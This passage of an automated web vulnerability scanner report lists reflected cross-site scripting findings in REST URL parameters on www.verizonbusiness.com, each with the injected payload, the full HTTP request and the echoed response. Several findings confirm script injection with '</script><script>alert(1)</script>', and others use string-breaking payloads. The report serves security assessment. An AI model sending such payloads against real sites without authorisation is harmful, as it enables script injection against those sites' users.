Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:41 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc698e';d962ad9b50c/1002a2a20-111-Mobility.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.626. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89580"%3b7578e08213f was submitted in the REST URL parameter 1. This input was echoed as 89580";7578e08213f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources89580"%3b7578e08213f/1002a2a20-111-Mobility.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:10 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources89580";7578e08213f/1002a2a20-111-Mobility.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.627. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b00f9'%3bbc3286ccbe2 was submitted in the REST URL parameter 2. This input was echoed as b00f9';bc3286ccbe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b00f9'%3bbc3286ccbe2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b00f9';bc3286ccbe2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.628. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531d2</script><script>alert(1)</script>8d3c801e429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a20-111-Mobility.xml531d2</script><script>alert(1)</script>8d3c801e429 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1ef91108d2cd24b6567004273dc94001"
Last-Modified: Wed, 17 Nov 2010 00:26:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d4b3824a3-15c5-4bae-8cc5-b8928559c993|VTID%3da251f6ee-9a88-4aef-a84c-ff69a83be321|SX%3d1289954811|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:35 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:51 GMT
Content-Length: 46585

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a20-111-Mobility.xml531d2</script><script>alert(1)</script>8d3c801e429</url>
...[SNIP]...

1.629. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c74b3"%3b235e1e538a5 was submitted in the REST URL parameter 1. This input was echoed as c74b3";235e1e538a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc74b3"%3b235e1e538a5/1002a2a21-111-Professional+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:20 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc74b3";235e1e538a5/1002a2a21-111-Professional+Services.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.630. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8d5'%3b7fec5d3a8f5 was submitted in the REST URL parameter 1. This input was echoed as 5d8d5';7fec5d3a8f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5d8d5'%3b7fec5d3a8f5/1002a2a21-111-Professional+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:37 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources5d8d5';7fec5d3a8f5/1002a2a21-111-Professional+Services.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.631. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7335b</script><script>alert(1)</script>5597f67b4e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a21-111-Professional+Services.xml7335b</script><script>alert(1)</script>5597f67b4e7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4224016a6f05f2a73ae223d9c8db35d8"
Last-Modified: Wed, 17 Nov 2010 00:26:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d730fee0b-d823-4cbc-9384-99b3ebc48b49|VTID%3d76b37265-bdfb-4544-89ca-7bf5cb33aa5d|SX%3d1289954787|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:11 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:28 GMT
Content-Length: 71449

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a21-111-Professional+Services.xml7335b</script><script>alert(1)</script>5597f67b4e7</url>
...[SNIP]...

1.632. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219ae'%3b8ab1ec1477a was submitted in the REST URL parameter 2. This input was echoed as 219ae';8ab1ec1477a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/219ae'%3b8ab1ec1477a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:38 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/219ae';8ab1ec1477a'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.633. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbd5"%3b6fa1d09fadc was submitted in the REST URL parameter 1. This input was echoed as fbbd5";6fa1d09fadc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfbbd5"%3b6fa1d09fadc/1002a2a22-111-Securing+Your+Enterprise.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesfbbd5";6fa1d09fadc/1002a2a22-111-Securing+Your+Enterprise.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.634. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec54'%3b24c4106812 was submitted in the REST URL parameter 1. This input was echoed as 2ec54';24c4106812 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2ec54'%3b24c4106812/1002a2a22-111-Securing+Your+Enterprise.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources2ec54';24c4106812/1002a2a22-111-Securing+Your+Enterprise.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.635. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 814df'%3b9b5170e1c69 was submitted in the REST URL parameter 2. This input was echoed as 814df';9b5170e1c69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/814df'%3b9b5170e1c69 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/814df';9b5170e1c69'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.636. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f774</script><script>alert(1)</script>4577e1a5323 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a22-111-Securing+Your+Enterprise.xml3f774</script><script>alert(1)</script>4577e1a5323 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d88caadf51411efb76a9947fbb199eb0"
Last-Modified: Wed, 17 Nov 2010 00:27:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d25d66deb-a24f-41a0-8a15-776ad6448d2f|VTID%3d03b70de1-a12f-446a-b13c-beeaeb2c57d3|SX%3d1289954828|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:27:09 GMT
Content-Length: 45338

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a22-111-Securing+Your+Enterprise.xml3f774</script><script>alert(1)</script>4577e1a5323</url>
...[SNIP]...

1.637. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72740'%3bf0bebdfb517 was submitted in the REST URL parameter 1. This input was echoed as 72740';f0bebdfb517 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72740'%3bf0bebdfb517/1002a2a23-111-Wireless.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:54 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources72740';f0bebdfb517/1002a2a23-111-Wireless.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.638. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81e8"%3b801cb894d35 was submitted in the REST URL parameter 1. This input was echoed as f81e8";801cb894d35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf81e8"%3b801cb894d35/1002a2a23-111-Wireless.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
